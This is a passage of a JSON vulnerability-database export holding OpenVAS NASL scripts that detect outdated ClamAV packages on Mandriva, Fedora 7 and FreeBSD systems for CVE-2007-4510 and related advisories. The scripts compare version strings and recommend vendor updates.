Linux 2007.0,\n Mandriva Linux 2007.0/X86_64,\n Mandriva Linux 2007.1,\n Mandriva Linux 2007.1/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2007-09/msg00000.php\");\n script_id(830082);\n script_version(\"$Revision: 6568 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:04:21 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 13:57:01 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDKSA\", value: \"2007:172\");\n script_cve_id(\"CVE-2007-4510\", \"CVE-2007-4560\");\n script_name( \"Mandriva Update for clamav MDKSA-2007:172 (clamav)\");\n\n script_summary(\"Check for the Version of clamav\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"clamav\", rpm:\"clamav~0.91.2~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-db\", rpm:\"clamav-db~0.91.2~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-milter\", rpm:\"clamav-milter~0.91.2~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamd\", rpm:\"clamd~0.91.2~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamdmon\", rpm:\"clamdmon~0.91.2~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libclamav-devel\", rpm:\"libclamav-devel~0.91.2~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libclamav2\", rpm:\"libclamav2~0.91.2~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64clamav-devel\", rpm:\"lib64clamav-devel~0.91.2~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64clamav2\", rpm:\"lib64clamav2~0.91.2~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2007.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"clamav\", rpm:\"clamav~0.91.2~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-db\", rpm:\"clamav-db~0.91.2~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-milter\", rpm:\"clamav-milter~0.91.2~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamd\", rpm:\"clamd~0.91.2~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamdmon\", rpm:\"clamdmon~0.91.2~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libclamav-devel\", rpm:\"libclamav-devel~0.91.2~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libclamav2\", rpm:\"libclamav2~0.91.2~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64clamav-devel\", rpm:\"lib64clamav-devel~0.91.2~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64clamav2\", rpm:\"lib64clamav2~0.91.2~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4510"], "description": "Check for the Version of clamav", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:861537", "href": "http://plugins.openvas.org/nasl.php?oid=861537", "type": "openvas", "title": "Fedora Update for clamav FEDORA-2007-2050", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for clamav FEDORA-2007-2050\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"clamav on Fedora 7\";\ntag_insight = \"Clam AntiVirus is an anti-virus toolkit for UNIX. The main purpose of this\n software is the integration with mail servers (attachment scanning). The\n package provides a flexible and scalable multi-threaded daemon, a command\n line scanner, and a tool for automatic updating via Internet. The programs\n are based on a shared library distributed with the Clam AntiVirus package,\n which you can use with your own software. The virus database is based on\n the virus database from OpenAntiVirus, but contains additional signatures\n (including signatures for popular polymorphic viruses, too) and is KEPT UP\n TO DATE.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2007-September/msg00104.html\");\n script_id(861537);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 16:01:32 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"FEDORA\", value: \"2007-2050\");\n script_cve_id(\"CVE-2007-4510\");\n script_name( \"Fedora Update for clamav FEDORA-2007-2050\");\n\n script_summary(\"Check for the Version of clamav\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC7\")\n{\n\n if ((res = isrpmvuln(pkg:\"clamav\", rpm:\"clamav~0.91.2~2.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-debuginfo\", rpm:\"clamav-debuginfo~0.91.2~2.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-devel\", rpm:\"clamav-devel~0.91.2~2.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-milter\", rpm:\"clamav-milter~0.91.2~2.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-milter-sysv\", rpm:\"clamav-milter-sysv~0.91.2~2.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-server-sysv\", rpm:\"clamav-server-sysv~0.91.2~2.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-data-empty\", rpm:\"clamav-data-empty~0.91.2~2.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-filesystem\", rpm:\"clamav-filesystem~0.91.2~2.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav\", rpm:\"clamav~0.91.2~2.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-server\", rpm:\"clamav-server~0.91.2~2.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-lib\", rpm:\"clamav-lib~0.91.2~2.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-data\", rpm:\"clamav-data~0.91.2~2.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-update\", rpm:\"clamav-update~0.91.2~2.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-debuginfo\", rpm:\"clamav-debuginfo~0.91.2~2.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-update\", rpm:\"clamav-update~0.91.2~2.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-milter-sysv\", rpm:\"clamav-milter-sysv~0.91.2~2.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-server-sysv\", rpm:\"clamav-server-sysv~0.91.2~2.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-filesystem\", rpm:\"clamav-filesystem~0.91.2~2.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-data\", rpm:\"clamav-data~0.91.2~2.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-devel\", rpm:\"clamav-devel~0.91.2~2.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav\", rpm:\"clamav~0.91.2~2.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-data-empty\", rpm:\"clamav-data-empty~0.91.2~2.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-server\", rpm:\"clamav-server~0.91.2~2.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-lib\", rpm:\"clamav-lib~0.91.2~2.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-milter\", rpm:\"clamav-milter~0.91.2~2.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:10:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4510"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-15T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:58795", "href": "http://plugins.openvas.org/nasl.php?oid=58795", "type": "openvas", "title": "FreeBSD Ports: clamav", "sourceData": "#\n#VID b6f6da57-680a-11dc-b350-001921ab2fa4\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: clamav\n\n=====\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\";\nif(description)\n{\n script_id(58795);\n script_version(\"$Revision: 4075 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-15 15:13:05 +0200 (Thu, 15 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2007-4510\");\n script_bugtraq_id(25398);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_name(\"FreeBSD Ports: clamav\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"clamav\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0.91.2\")<0) {\n txt += 'Package clamav version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:57:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-6335", "CVE-2008-0318", "CVE-2007-4510"], "description": "Check for the Version of clamav", "modified": "2017-07-10T00:00:00", "published": "2009-02-16T00:00:00", "id": "OPENVAS:860614", "href": "http://plugins.openvas.org/nasl.php?oid=860614", "type": "openvas", "title": "Fedora Update for clamav FEDORA-2008-1608", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for clamav FEDORA-2008-1608\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"clamav on Fedora 7\";\ntag_insight = \"Clam AntiVirus is an anti-virus toolkit for UNIX. The main purpose of this\n software is the integration with mail servers (attachment scanning). The\n package provides a flexible and scalable multi-threaded daemon, a command\n line scanner, and a tool for automatic updating via Internet. The programs\n are based on a shared library distributed with the Clam AntiVirus package,\n which you can use with your own software. The virus database is based on\n the virus database from OpenAntiVirus, but contains additional signatures\n (including signatures for popular polymorphic viruses, too) and is KEPT UP\n TO DATE.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2008-February/msg00462.html\");\n script_id(860614);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-16 14:16:57 +0100 (Mon, 16 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2008-1608\");\n script_cve_id(\"CVE-2008-0318\", \"CVE-2007-6335\", \"CVE-2007-4510\");\n script_name( \"Fedora Update for clamav FEDORA-2008-1608\");\n\n script_summary(\"Check for the Version of clamav\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC7\")\n{\n\n if ((res = isrpmvuln(pkg:\"clamav\", rpm:\"clamav~0.92.1~1.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-6335", "CVE-2007-6337", "CVE-2007-4510", "CVE-2007-6336"], "description": "Check for the Version of clamav", "modified": "2017-07-10T00:00:00", "published": "2009-02-17T00:00:00", "id": "OPENVAS:860691", "href": "http://plugins.openvas.org/nasl.php?oid=860691", "type": "openvas", "title": "Fedora Update for clamav FEDORA-2008-0170", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for clamav FEDORA-2008-0170\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"clamav on Fedora 7\";\ntag_insight = \"Clam AntiVirus is an anti-virus toolkit for UNIX. The main purpose of this\n software is the integration with mail servers (attachment scanning). The\n package provides a flexible and scalable multi-threaded daemon, a command\n line scanner, and a tool for automatic updating via Internet. The programs\n are based on a shared library distributed with the Clam AntiVirus package,\n which you can use with your own software. The virus database is based on\n the virus database from OpenAntiVirus, but contains additional signatures\n (including signatures for popular polymorphic viruses, too) and is KEPT UP\n TO DATE.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2008-January/msg00644.html\");\n script_id(860691);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-17 17:12:43 +0100 (Tue, 17 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2008-0170\");\n script_cve_id(\"CVE-2007-6335\", \"CVE-2007-6336\", \"CVE-2007-6337\", \"CVE-2007-4510\");\n script_name( \"Fedora Update for clamav FEDORA-2008-0170\");\n\n script_summary(\"Check for the Version of clamav\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC7\")\n{\n\n if ((res = isrpmvuln(pkg:\"clamav\", rpm:\"clamav~0.92~6.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-debuginfo\", rpm:\"clamav-debuginfo~0.92~6.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-milter-sysv\", rpm:\"clamav-milter-sysv~0.92~6.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-milter\", rpm:\"clamav-milter~0.92~6.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-server-sysv\", rpm:\"clamav-server-sysv~0.92~6.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-server\", rpm:\"clamav-server~0.92~6.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-update\", rpm:\"clamav-update~0.92~6.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-data-empty\", rpm:\"clamav-data-empty~0.92~6.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-data\", rpm:\"clamav-data~0.92~6.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-devel\", rpm:\"clamav-devel~0.92~6.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-lib\", rpm:\"clamav-lib~0.92~6.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-filesystem\", rpm:\"clamav-filesystem~0.92~6.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav\", rpm:\"clamav~0.92~6.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-debuginfo\", rpm:\"clamav-debuginfo~0.92~6.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-milter-sysv\", rpm:\"clamav-milter-sysv~0.92~6.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-milter\", rpm:\"clamav-milter~0.92~6.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-server-sysv\", rpm:\"clamav-server-sysv~0.92~6.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-server\", rpm:\"clamav-server~0.92~6.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-update\", rpm:\"clamav-update~0.92~6.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-data-empty\", rpm:\"clamav-data-empty~0.92~6.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-data\", rpm:\"clamav-data~0.92~6.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-devel\", rpm:\"clamav-devel~0.92~6.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-lib\", rpm:\"clamav-lib~0.92~6.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-filesystem\", rpm:\"clamav-filesystem~0.92~6.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav\", rpm:\"clamav~0.92~6.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-6335", "CVE-2008-1387", "CVE-2008-1100", "CVE-2007-4510", "CVE-2008-0314", "CVE-2008-1833"], "description": "Check for the Version of clamav", "modified": 